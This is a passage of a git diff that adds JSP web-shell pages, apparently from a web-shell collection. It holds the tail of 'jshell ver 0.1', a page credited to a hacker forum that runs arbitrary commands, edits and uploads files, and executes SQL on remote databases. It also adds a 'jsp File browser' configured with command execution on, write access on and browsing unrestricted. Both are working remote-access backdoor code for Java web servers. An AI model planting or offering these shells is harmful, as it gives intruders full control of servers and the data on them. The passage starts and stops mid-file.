+ result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent);
+ }
+ } else if (fsAction.equals("createFolder")) {
+ if (request.getParameter("folderName") == null) {
+ result = "目录名不能为空 ";
+ } else {
+ String folderName = Unicode2GB(request.getParameter("folderName").trim());
+ if (folderName.equals("")) {
+ result = "目录名不能为空 ";
+ } else {
+ result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName);
+ }
+ }
+ } else if (fsAction.equals("createFile")) {
+ if (request.getParameter("fileName") == null) {
+ result = "文件名不能为空 ";
+ } else {
+ String fileName = Unicode2GB(request.getParameter("fileName").trim());
+ if (fileName.equals("")) {
+ result = "文件名不能为空 ";
+ } else {
+ result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName);
+ }
+ }
+ } else if (fsAction.equals("deleteFile")) {
+ if (request.getParameter("filesDelete") == null) {
+ result = "没有选择要删除的文件 ";
+ } else {
+ String[] files2Delete = (String[])request.getParameterValues("filesDelete");
+ if (files2Delete.length == 0) {
+ result = "没有选择要删除的文件 ";
+ } else {
+ for (int n = 0; n < files2Delete.length; n ++) {
+ files2Delete[n] = Unicode2GB(files2Delete[n]);
+ }
+ result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete);
+ }
+ }
+ } else if (fsAction.equals("saveAs")) {
+ if (request.getParameter("fileContent") == null) {
+ result = "页面导航错误 ";
+ } else {
+ String fileContent = Unicode2GB(request.getParameter("fileContent"));
+ result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent);
+ }
+ } else if (fsAction.equals("upload")) {
+ result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action);
+ } else if (fsAction.equals("copyto")) {
+ if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) {
+ result = "没有选择要复制的文件 ";
+ } else {
+ String[] files2Copy = request.getParameterValues("filesDelete");
+ String dstPath = request.getParameter("dstPath").trim();
+ if (files2Copy.length == 0) {
+ result = "没有选择要复制的文件 ";
+ } else if (dstPath.equals("")) {
+ result = "没有填写要复制到的目录路径 ";
+ } else {
+ for (int i = 0; i < files2Copy.length; i ++)
+ files2Copy[i] = Unicode2GB(files2Copy[i]);
+
+ result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath));
+ }
+ }
+ } else if (fsAction.equals("rename")) {
+ if (request.getParameter("fileRename") == null) {
+ result = "页面导航错误 ";
+ } else {
+ String file2Rename = request.getParameter("fileRename").trim();
+ String newName = request.getParameter("newName").trim();
+ if (file2Rename.equals("")) {
+ result = "没有选择要重命名的文件 ";
+ } else if (newName.equals("")) {
+ result = "没有填写新文件名 ";
+ } else {
+ result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName));
+ }
+ }
+ }
+%>
+
+
+
+ <%= result.trim().equals("")?" " : result%>
+
+
+<%
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("command")) {
+ String cmd = "";
+ InputStream ins = null;
+ String result = "";
+
+ if (request.getParameter("command") != null) {
+ cmd = (String)request.getParameter("command");
+ result = exeCmd(cmd);
+ }
+// print the command form
+//========================================================================================
+%>
+
+
+
+ <%=result == "" ? " " : result%>
+
+
+<%
+//=========================================================================================
+// end of printing command form
+///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("database")) {
+ String dbAction = "";
+ String result = "";
+ String dbType = "";
+ String dbServer = "";
+ String dbPort = "";
+ String dbUsername = "";
+ String dbPassword = "";
+ String dbName = "";
+ String dbResult = "";
+ String sql = "";
+
+ if (request.getParameter("dbAction") == null) {
+ dbAction = "main";
+ } else {
+ dbAction = request.getParameter("dbAction").trim();
+ if (dbAction.equals(""))
+ dbAction = "main";
+ }
+
+ if (dbAction.equals("main")) {
+ result = " ";
+ } else if (dbAction.equals("dbConnect")) {
+ if (request.getParameter("dbType") == null ||
+ request.getParameter("dbServer") == null ||
+ request.getParameter("dbPort") == null ||
+ request.getParameter("dbUsername") == null ||
+ request.getParameter("dbPassword") == null ||
+ request.getParameter("dbName") == null) {
+ response.sendRedirect(request.getRequestURI() + "?action=" + action);
+ } else {
+ dbType = request.getParameter("dbType").trim();
+ dbServer = request.getParameter("dbServer").trim();
+ dbPort = request.getParameter("dbPort").trim();
+ dbUsername = request.getParameter("dbUsername").trim();
+ dbPassword = request.getParameter("dbPassword").trim();
+ dbName = request.getParameter("dbName").trim();
+
+ if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) {
+ if (DBConnect(dbUsername, dbPassword)) {
+ if (request.getParameter("sql") != null) {
+ sql = request.getParameter("sql").trim();
+ if (! sql.equals("")) {
+ dbResult = DBExecute(sql);
+ }
+ }
+
+ result = "\n";
+ result += "sql语句数据库连接失败 ";
+ }
+ } else {
+ result = "数据库连接驱动没有找到 ";
+ }
+ }
+ }
+%>
+
+
+
+
+
+ <%=dbResult%>
+
+
+
+<%
+
+////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("config")) {
+ String cfAction = "";
+ int i;
+
+ if (request.getParameter("cfAction") == null) {
+ cfAction = "main";
+ } else {
+ cfAction = request.getParameter("cfAction").trim();
+ if (cfAction.equals(""))
+ cfAction = "main";
+ }
+
+ if (cfAction.equals("main")) {
+// start of config form
+//==========================================================================================
+%>
+
+
+<%
+ } else if (cfAction.equals("save")) {
+ if (request.getParameter("password") == null ||
+ request.getParameter("encode") == null ||
+ request.getParameter("sessionTime") == null ||
+ request.getParameterValues("textFileTypes") == null) {
+ response.sendRedirect(request.getRequestURI());
+ }
+
+ String result = "";
+
+ String newPassword = request.getParameter("password").trim();
+ String newEncodeType = request.getParameter("encode").trim();
+ String newSessionTime = request.getParameter("sessionTime").trim();
+ String[] newTextFileTypes = request.getParameterValues("textFileTypes");
+ String jshellPath = request.getRealPath(request.getServletPath());
+
+ try {
+ JshellConfig jconfig = new JshellConfig(jshellPath);
+ jconfig.setPassword(newPassword);
+ jconfig.setEncodeType(newEncodeType);
+ jconfig.setSessionTime(newSessionTime);
+ jconfig.setTextFileTypes(newTextFileTypes);
+ jconfig.save();
+ result += "设置保存成功,正在返回,请稍候……";
+ result += "" + e.getMessage() + " ";
+ }
+
+%>
+
+
+ <%=result == "" ? " " : result%>
+
+
+<%
+ }
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+//==========================================================================================
+// end of config form
+ } else if (action.equals("about")) {
+// start of about
+//==========================================================================================
+%>
+
+
+ 关于 jshell ver 0.1
+
+
+
+
+
+ created by `■嘿■黑㊣ and welcome to 黑狼基地论坛
+
+
+<%
+//==========================================================================================
+ }
+}
+%>
+
+
+
\ No newline at end of file
diff --git a/jsp/jspbrowser/Browser.jsp b/jsp/jspbrowser/Browser.jsp
new file mode 100644
index 0000000..2bac9d1
--- /dev/null
+++ b/jsp/jspbrowser/Browser.jsp
@@ -0,0 +1,1934 @@
+<%--
+ jsp File browser 1.2
+ Copyright (C) 2003-2006 Boris von Loesch
+ This program is free software; you can redistribute it and/or modify it under
+ the terms of the GNU General Public License as published by the
+ Free Software Foundation; either version 2 of the License, or (at your option)
+ any later version.
+ This program is distributed in the hope that it will be useful, but
+ WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
+ FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
+ You should have received a copy of the GNU General Public License along with
+ this program; if not, write to the
+ Free Software Foundation, Inc.,
+ 59 Temple Place, Suite 330,
+ Boston, MA 02111-1307 USA
+ - Description: jsp File browser v1.2 -- This JSP program allows remote web-based
+ file access and manipulation. You can copy, create, move and delete files.
+ Text files can be edited and groups of files and folders can be downloaded
+ as a single zip file that's created on the fly.
+ - Credits: Taylor Bastien, David Levine, David Cowan, Lieven Govaerts
+--%>
+<%@page import="java.util.*,
+ java.net.*,
+ java.text.*,
+ java.util.zip.*,
+ java.io.*"
+%>
+<%!
+ //FEATURES
+ private static final boolean NATIVE_COMMANDS = true;
+ /**
+ *If true, all operations (besides upload and native commands)
+ *which change something on the file system are permitted
+ */
+ private static final boolean READ_ONLY = false;
+ //If true, uploads are allowed even if READ_ONLY = true
+ private static final boolean ALLOW_UPLOAD = true;
+
+ //Allow browsing and file manipulation only in certain directories
+ private static final boolean RESTRICT_BROWSING = false;
+ //If true, the user is allowed to browse only in RESTRICT_PATH,
+ //if false, the user is allowed to browse all directories besides RESTRICT_PATH
+ private static final boolean RESTRICT_WHITELIST = false;
+ //Paths, sperated by semicolon
+ //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
+ private static final String RESTRICT_PATH = "/etc;/var";
+
+ //The refresh time in seconds of the upload monitor window
+ private static final int UPLOAD_MONITOR_REFRESH = 2;
+ //The number of colums for the edit field
+ private static final int EDITFIELD_COLS = 85;
+ //The number of rows for the edit field
+ private static final int EDITFIELD_ROWS = 30;
+ //Open a new window to view a file
+ private static final boolean USE_POPUP = true;
+ /**
+ * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be
+ * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries.
+ * This can yield to performance issues. Turn it off, if the directory loads to slow.
+ */
+ private static final boolean USE_DIR_PREVIEW = false;
+ private static final int DIR_PREVIEW_NUMBER = 10;
+ /**
+ * The name of an optional CSS Stylesheet file
+ */
+ private static final String CSS_NAME = "Browser.css";
+ /**
+ * The compression level for zip file creation (0-9)
+ * 0 = No compression
+ * 1 = Standard compression (Very fast)
+ * ...
+ * 9 = Best compression (Very slow)
+ */
+ private static final int COMPRESSION_LEVEL = 1;
+ /**
+ * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
+ * server runs on a windows platform, to avoid a message box, if you try to access
+ * an empty removable drive (See KNOWN BUGS in Readme.txt).
+ */
+ private static final String[] FORBIDDEN_DRIVES = {"a:\\"};
+
+ /**
+ * Command of the shell interpreter and the parameter to run a programm
+ */
+ private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
+ //private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix
+
+ /**
+ * Max time in ms a process is allowed to run, before it will be terminated
+ */
+ private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds
+
+ //Button names
+ private static final String SAVE_AS_ZIP = "Download selected files as (z)ip";
+ private static final String RENAME_FILE = "(R)ename File";
+ private static final String DELETE_FILES = "(Del)ete selected files";
+ private static final String CREATE_DIR = "Create (D)ir";
+ private static final String CREATE_FILE = "(C)reate File";
+ private static final String MOVE_FILES = "(M)ove Files";
+ private static final String COPY_FILES = "Cop(y) Files";
+ private static final String LAUNCH_COMMAND = "(L)aunch external program";
+ private static final String UPLOAD_FILES = "Upload";
+
+ //Normally you should not change anything after this line
+ //----------------------------------------------------------------------------------
+ //Change this to locate the tempfile directory for upload (not longer needed)
+ private static String tempdir = ".";
+ private static String VERSION_NR = "1.2";
+ private static DateFormat dateFormat = DateFormat.getDateTimeInstance();
+
+ public class UplInfo {
+
+ public long totalSize;
+ public long currSize;
+ public long starttime;
+ public boolean aborted;
+
+ public UplInfo() {
+ totalSize = 0l;
+ currSize = 0l;
+ starttime = System.currentTimeMillis();
+ aborted = false;
+ }
+
+ public UplInfo(int size) {
+ totalSize = size;
+ currSize = 0;
+ starttime = System.currentTimeMillis();
+ aborted = false;
+ }
+
+ public String getUprate() {
+ long time = System.currentTimeMillis() - starttime;
+ if (time != 0) {
+ long uprate = currSize * 1000 / time;
+ return convertFileSize(uprate) + "/s";
+ }
+ else return "n/a";
+ }
+
+ public int getPercent() {
+ if (totalSize == 0) return 0;
+ else return (int) (currSize * 100 / totalSize);
+ }
+
+ public String getTimeElapsed() {
+ long time = (System.currentTimeMillis() - starttime) / 1000l;
+ if (time - 60l >= 0){
+ if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+ else return time / 60 + ":0" + (time % 60) + "m";
+ }
+ else return time<10 ? "0" + time + "s": time + "s";
+ }
+
+ public String getTimeEstimated() {
+ if (currSize == 0) return "n/a";
+ long time = System.currentTimeMillis() - starttime;
+ time = totalSize * time / currSize;
+ time /= 1000l;
+ if (time - 60l >= 0){
+ if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+ else return time / 60 + ":0" + (time % 60) + "m";
+ }
+ else return time<10 ? "0" + time + "s": time + "s";
+ }
+
+ }
+
+ public class FileInfo {
+
+ public String name = null, clientFileName = null, fileContentType = null;
+ private byte[] fileContents = null;
+ public File file = null;
+ public StringBuffer sb = new StringBuffer(100);
+
+ public void setFileContents(byte[] aByteArray) {
+ fileContents = new byte[aByteArray.length];
+ System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
+ }
+ }
+
+ public static class UploadMonitor {
+
+ static Hashtable uploadTable = new Hashtable();
+
+ static void set(String fName, UplInfo info) {
+ uploadTable.put(fName, info);
+ }
+
+ static void remove(String fName) {
+ uploadTable.remove(fName);
+ }
+
+ static UplInfo getInfo(String fName) {
+ UplInfo info = (UplInfo) uploadTable.get(fName);
+ return info;
+ }
+ }
+
+ // A Class with methods used to process a ServletInputStream
+ public class HttpMultiPartParser {
+
+ //private final String lineSeparator = System.getProperty("line.separator", "\n");
+ private final int ONE_MB = 1024 * 1;
+
+ public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
+ int clength) throws IllegalArgumentException, IOException {
+ if (is == null) throw new IllegalArgumentException("InputStream");
+ if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
+ "\"" + boundary + "\" is an illegal boundary indicator");
+ boundary = "--" + boundary;
+ StringTokenizer stLine = null, stFields = null;
+ FileInfo fileInfo = null;
+ Hashtable dataTable = new Hashtable(5);
+ String line = null, field = null, paramName = null;
+ boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
+ boolean isFile = false;
+ if (saveFiles) { // Create the required directory (including parent dirs)
+ File f = new File(saveInDir);
+ f.mkdirs();
+ }
+ line = getLine(is);
+ if (line == null || !line.startsWith(boundary)) throw new IOException(
+ "Boundary not found; boundary = " + boundary + ", line = " + line);
+ while (line != null) {
+ if (line == null || !line.startsWith(boundary)) return dataTable;
+ line = getLine(is);
+ if (line == null) return dataTable;
+ stLine = new StringTokenizer(line, ";\r\n");
+ if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+ "Bad data in second line");
+ line = stLine.nextToken().toLowerCase();
+ if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
+ "Bad data in second line");
+ stFields = new StringTokenizer(stLine.nextToken(), "=\"");
+ if (stFields.countTokens() < 2) throw new IllegalArgumentException(
+ "Bad data in second line");
+ fileInfo = new FileInfo();
+ stFields.nextToken();
+ paramName = stFields.nextToken();
+ isFile = false;
+ if (stLine.hasMoreTokens()) {
+ field = stLine.nextToken();
+ stFields = new StringTokenizer(field, "=\"");
+ if (stFields.countTokens() > 1) {
+ if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
+ fileInfo.name = paramName;
+ String value = stFields.nextToken();
+ if (value != null && value.trim().length() > 0) {
+ fileInfo.clientFileName = value;
+ isFile = true;
+ }
+ else {
+ line = getLine(is); // Skip "Content-Type:" line
+ line = getLine(is); // Skip blank line
+ line = getLine(is); // Skip blank line
+ line = getLine(is); // Position to boundary line
+ continue;
+ }
+ }
+ }
+ else if (field.toLowerCase().indexOf("filename") >= 0) {
+ line = getLine(is); // Skip "Content-Type:" line
+ line = getLine(is); // Skip blank line
+ line = getLine(is); // Skip blank line
+ line = getLine(is); // Position to boundary line
+ continue;
+ }
+ }
+ boolean skipBlankLine = true;
+ if (isFile) {
+ line = getLine(is);
+ if (line == null) return dataTable;
+ if (line.trim().length() < 1) skipBlankLine = false;
+ else {
+ stLine = new StringTokenizer(line, ": ");
+ if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+ "Bad data in third line");
+ stLine.nextToken(); // Content-Type
+ fileInfo.fileContentType = stLine.nextToken();
+ }
+ }
+ if (skipBlankLine) {
+ line = getLine(is);
+ if (line == null) return dataTable;
+ }
+ if (!isFile) {
+ line = getLine(is);
+ if (line == null) return dataTable;
+ dataTable.put(paramName, line);
+ // If parameter is dir, change saveInDir to dir
+ if (paramName.equals("dir")) saveInDir = line;
+ line = getLine(is);
+ continue;
+ }
+ try {
+ UplInfo uplInfo = new UplInfo(clength);
+ UploadMonitor.set(fileInfo.clientFileName, uplInfo);
+ OutputStream os = null;
+ String path = null;
+ if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
+ fileInfo.clientFileName));
+ else os = new ByteArrayOutputStream(ONE_MB);
+ boolean readingContent = true;
+ byte previousLine[] = new byte[2 * ONE_MB];
+ byte temp[] = null;
+ byte currentLine[] = new byte[2 * ONE_MB];
+ int read, read3;
+ if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
+ line = null;
+ break;
+ }
+ while (readingContent) {
+ if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
+ line = null;
+ uplInfo.aborted = true;
+ break;
+ }
+ if (compareBoundary(boundary, currentLine)) {
+ os.write(previousLine, 0, read - 2);
+ line = new String(currentLine, 0, read3);
+ break;
+ }
+ else {
+ os.write(previousLine, 0, read);
+ uplInfo.currSize += read;
+ temp = currentLine;
+ currentLine = previousLine;
+ previousLine = temp;
+ read = read3;
+ }//end else
+ }//end while
+ os.flush();
+ os.close();
+ if (!saveFiles) {
+ ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
+ fileInfo.setFileContents(baos.toByteArray());
+ }
+ else fileInfo.file = new File(path);
+ dataTable.put(paramName, fileInfo);
+ uplInfo.currSize = uplInfo.totalSize;
+ }//end try
+ catch (IOException e) {
+ throw e;
+ }
+ }
+ return dataTable;
+ }
+
+ /**
+ * Compares boundary string to byte array
+ */
+ private boolean compareBoundary(String boundary, byte ba[]) {
+ if (boundary == null || ba == null) return false;
+ for (int i = 0; i < boundary.length(); i++)
+ if ((byte) boundary.charAt(i) != ba[i]) return false;
+ return true;
+ }
+
+ /** Convenience method to read HTTP header lines */
+ private synchronized String getLine(ServletInputStream sis) throws IOException {
+ byte b[] = new byte[1024];
+ int read = sis.readLine(b, 0, b.length), index;
+ String line = null;
+ if (read != -1) {
+ line = new String(b, 0, read);
+ if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
+ }
+ return line;
+ }
+
+ public String getFileName(String dir, String fileName) throws IllegalArgumentException {
+ String path = null;
+ if (dir == null || fileName == null) throw new IllegalArgumentException(
+ "dir or fileName is null");
+ int index = fileName.lastIndexOf('/');
+ String name = null;
+ if (index >= 0) name = fileName.substring(index + 1);
+ else name = fileName;
+ index = name.lastIndexOf('\\');
+ if (index >= 0) fileName = name.substring(index + 1);
+ path = dir + File.separator + fileName;
+ if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
+ else return path.replace('/', File.separatorChar);
+ }
+ } //End of class HttpMultiPartParser
+
+ /**
+ * This class is a comparator to sort the filenames and dirs
+ */
+ class FileComp implements Comparator {
+
+ int mode;
+ int sign;
+
+ FileComp() {
+ this.mode = 1;
+ this.sign = 1;
+ }
+
+ /**
+ * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type
+ * The default sorting method is by Name
+ * Negative mode means descending sort
+ */
+ FileComp(int mode) {
+ if (mode < 0) {
+ this.mode = -mode;
+ sign = -1;
+ }
+ else {
+ this.mode = mode;
+ this.sign = 1;
+ }
+ }
+
+ public int compare(Object o1, Object o2) {
+ File f1 = (File) o1;
+ File f2 = (File) o2;
+ if (f1.isDirectory()) {
+ if (f2.isDirectory()) {
+ switch (mode) {
+ //Filename or Type
+ case 1:
+ case 4:
+ return sign
+ * f1.getAbsolutePath().toUpperCase().compareTo(
+ f2.getAbsolutePath().toUpperCase());
+ //Filesize
+ case 2:
+ return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
+ //Date
+ case 3:
+ return sign
+ * (new Long(f1.lastModified())
+ .compareTo(new Long(f2.lastModified())));
+ default:
+ return 1;
+ }
+ }
+ else return -1;
+ }
+ else if (f2.isDirectory()) return 1;
+ else {
+ switch (mode) {
+ case 1:
+ return sign
+ * f1.getAbsolutePath().toUpperCase().compareTo(
+ f2.getAbsolutePath().toUpperCase());
+ case 2:
+ return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
+ case 3:
+ return sign
+ * (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified())));
+ case 4: { // Sort by extension
+ int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.');
+ int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.');
+ if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension
+ return sign
+ * f1.getAbsolutePath().toUpperCase().compareTo(
+ f2.getAbsolutePath().toUpperCase());
+ }
+ // f1 has no extension
+ else if (tempIndexf1 == -1) return -sign;
+ // f2 has no extension
+ else if (tempIndexf2 == -1) return sign;
+ // Both have an extension
+ else {
+ String tempEndf1 = f1.getAbsolutePath().toUpperCase()
+ .substring(tempIndexf1);
+ String tempEndf2 = f2.getAbsolutePath().toUpperCase()
+ .substring(tempIndexf2);
+ return sign * tempEndf1.compareTo(tempEndf2);
+ }
+ }
+ default:
+ return 1;
+ }
+ }
+ }
+ }
+
+ /**
+ * Wrapperclass to wrap an OutputStream around a Writer
+ */
+ class Writer2Stream extends OutputStream {
+
+ Writer out;
+
+ Writer2Stream(Writer w) {
+ super();
+ out = w;
+ }
+
+ public void write(int i) throws IOException {
+ out.write(i);
+ }
+
+ public void write(byte[] b) throws IOException {
+ for (int i = 0; i < b.length; i++) {
+ int n = b[i];
+ //Convert byte to ubyte
+ n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
+ out.write(n);
+ }
+ }
+
+ public void write(byte[] b, int off, int len) throws IOException {
+ for (int i = off; i < off + len; i++) {
+ int n = b[i];
+ n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
+ out.write(n);
+ }
+ }
+ } //End of class Writer2Stream
+
+ static Vector expandFileList(String[] files, boolean inclDirs) {
+ Vector v = new Vector();
+ if (files == null) return v;
+ for (int i = 0; i < files.length; i++)
+ v.add(new File(URLDecoder.decode(files[i])));
+ for (int i = 0; i < v.size(); i++) {
+ File f = (File) v.get(i);
+ if (f.isDirectory()) {
+ File[] fs = f.listFiles();
+ for (int n = 0; n < fs.length; n++)
+ v.add(fs[n]);
+ if (!inclDirs) {
+ v.remove(i);
+ i--;
+ }
+ }
+ }
+ return v;
+ }
+
+ /**
+ * Method to build an absolute path
+ * @param dir the root dir
+ * @param name the name of the new directory
+ * @return if name is an absolute directory, returns name, else returns dir+name
+ */
+ static String getDir(String dir, String name) {
+ if (!dir.endsWith(File.separator)) dir = dir + File.separator;
+ File mv = new File(name);
+ String new_dir = null;
+ if (!mv.isAbsolute()) {
+ new_dir = dir + name;
+ }
+ else new_dir = name;
+ return new_dir;
+ }
+
+ /**
+ * This Method converts a byte size in a kbytes or Mbytes size, depending on the size
+ * @param size The size in bytes
+ * @return String with size and unit
+ */
+ static String convertFileSize(long size) {
+ int divisor = 1;
+ String unit = "bytes";
+ if (size >= 1024 * 1024) {
+ divisor = 1024 * 1024;
+ unit = "MB";
+ }
+ else if (size >= 1024) {
+ divisor = 1024;
+ unit = "KB";
+ }
+ if (divisor == 1) return size / divisor + " " + unit;
+ String aftercomma = "" + 100 * (size % divisor) / divisor;
+ if (aftercomma.length() == 1) aftercomma = "0" + aftercomma;
+ return size / divisor + "." + aftercomma + " " + unit;
+ }
+
+ /**
+ * Copies all data from in to out
+ * @param in the input stream
+ * @param out the output stream
+ * @param buffer copy buffer
+ */
+ static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException {
+ copyStreamsWithoutClose(in, out, buffer);
+ in.close();
+ out.close();
+ }
+
+ /**
+ * Copies all data from in to out
+ * @param in the input stream
+ * @param out the output stream
+ * @param buffer copy buffer
+ */
+ static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer)
+ throws IOException {
+ int b;
+ while ((b = in.read(buffer)) != -1)
+ out.write(buffer, 0, b);
+ }
+
+ /**
+ * Returns the Mime Type of the file, depending on the extension of the filename
+ */
+ static String getMimeType(String fName) {
+ fName = fName.toLowerCase();
+ if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg";
+ else if (fName.endsWith(".gif")) return "image/gif";
+ else if (fName.endsWith(".pdf")) return "application/pdf";
+ else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html";
+ else if (fName.endsWith(".avi")) return "video/x-msvideo";
+ else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime";
+ else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg";
+ else if (fName.endsWith(".zip")) return "application/zip";
+ else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff";
+ else if (fName.endsWith(".rtf")) return "application/rtf";
+ else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi";
+ else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv")
+ || fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt")
+ || fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel";
+ else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword";
+ else if (fName.endsWith(".png")) return "image/png";
+ else if (fName.endsWith(".xml")) return "text/xml";
+ else if (fName.endsWith(".svg")) return "image/svg+xml";
+ else if (fName.endsWith(".mp3")) return "audio/mp3";
+ else if (fName.endsWith(".ogg")) return "audio/ogg";
+ else return "text/plain";
+ }
+
+ /**
+ * Converts some important chars (int) to the corresponding html string
+ */
+ static String conv2Html(int i) {
+ if (i == '&') return "&";
+ else if (i == '<') return "<";
+ else if (i == '>') return ">";
+ else if (i == '"') return """;
+ else return "" + (char) i;
+ }
+
+ /**
+ * Converts a normal string to a html conform string
+ */
+ static String conv2Html(String st) {
+ StringBuffer buf = new StringBuffer();
+ for (int i = 0; i < st.length(); i++) {
+ buf.append(conv2Html(st.charAt(i)));
+ }
+ return buf.toString();
+ }
+
+ /**
+ * Starts a native process on the server
+ * @param command the command to start the process
+ * @param dir the dir in which the process starts
+ */
+ static String startProcess(String command, String dir) throws IOException {
+ StringBuffer ret = new StringBuffer();
+ String[] comm = new String[3];
+ comm[0] = COMMAND_INTERPRETER[0];
+ comm[1] = COMMAND_INTERPRETER[1];
+ comm[2] = command;
+ long start = System.currentTimeMillis();
+ try {
+ //Start process
+ Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
+ //Get input and error streams
+ BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream());
+ BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream());
+ boolean end = false;
+ while (!end) {
+ int c = 0;
+ while ((ls_err.available() > 0) && (++c <= 1000)) {
+ ret.append(conv2Html(ls_err.read()));
+ }
+ c = 0;
+ while ((ls_in.available() > 0) && (++c <= 1000)) {
+ ret.append(conv2Html(ls_in.read()));
+ }
+ try {
+ ls_proc.exitValue();
+ //if the process has not finished, an exception is thrown
+ //else
+ while (ls_err.available() > 0)
+ ret.append(conv2Html(ls_err.read()));
+ while (ls_in.available() > 0)
+ ret.append(conv2Html(ls_in.read()));
+ end = true;
+ }
+ catch (IllegalThreadStateException ex) {
+ //Process is running
+ }
+ //The process is not allowed to run longer than given time.
+ if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) {
+ ls_proc.destroy();
+ end = true;
+ ret.append("!!!! Process has timed out, destroyed !!!!!");
+ }
+ try {
+ Thread.sleep(50);
+ }
+ catch (InterruptedException ie) {}
+ }
+ }
+ catch (IOException e) {
+ ret.append("Error: " + e);
+ }
+ return ret.toString();
+ }
+
+ /**
+ * Converts a dir string to a linked dir string
+ * @param dir the directory string (e.g. /usr/local/httpd)
+ * @param browserLink web-path to Browser.jsp
+ */
+ static String dir2linkdir(String dir, String browserLink, int sortMode) {
+ File f = new File(dir);
+ StringBuffer buf = new StringBuffer();
+ while (f.getParentFile() != null) {
+ if (f.canRead()) {
+ String encPath = URLEncoder.encode(f.getAbsolutePath());
+ buf.insert(0, "" + conv2Html(f.getName()) + File.separator + " ");
+ }
+ else buf.insert(0, conv2Html(f.getName()) + File.separator);
+ f = f.getParentFile();
+ }
+ if (f.canRead()) {
+ String encPath = URLEncoder.encode(f.getAbsolutePath());
+ buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + " ");
+ }
+ else buf.insert(0, f.getAbsolutePath());
+ return buf.toString();
+ }
+
+ /**
+ * Returns true if the given filename tends towards a packed file
+ */
+ static boolean isPacked(String name, boolean gz) {
+ return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar")
+ || (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase()
+ .endsWith(".war"));
+ }
+
+ /**
+ * If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not
+ */
+ static boolean isAllowed(File path, boolean write) throws IOException{
+ if (READ_ONLY && write) return false;
+ if (RESTRICT_BROWSING) {
+ StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";");
+ while (stk.hasMoreTokens()){
+ if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken()))
+ return RESTRICT_WHITELIST;
+ }
+ return !RESTRICT_WHITELIST;
+ }
+ else return true;
+ }
+
+ //---------------------------------------------------------------------------------------------------------------
+
+ %>
+<%
+ //Get the current browsing directory
+ request.setAttribute("dir", request.getParameter("dir"));
+ // The browser_name variable is used to keep track of the URI
+ // of the jsp file itself. It is used in all link-backs.
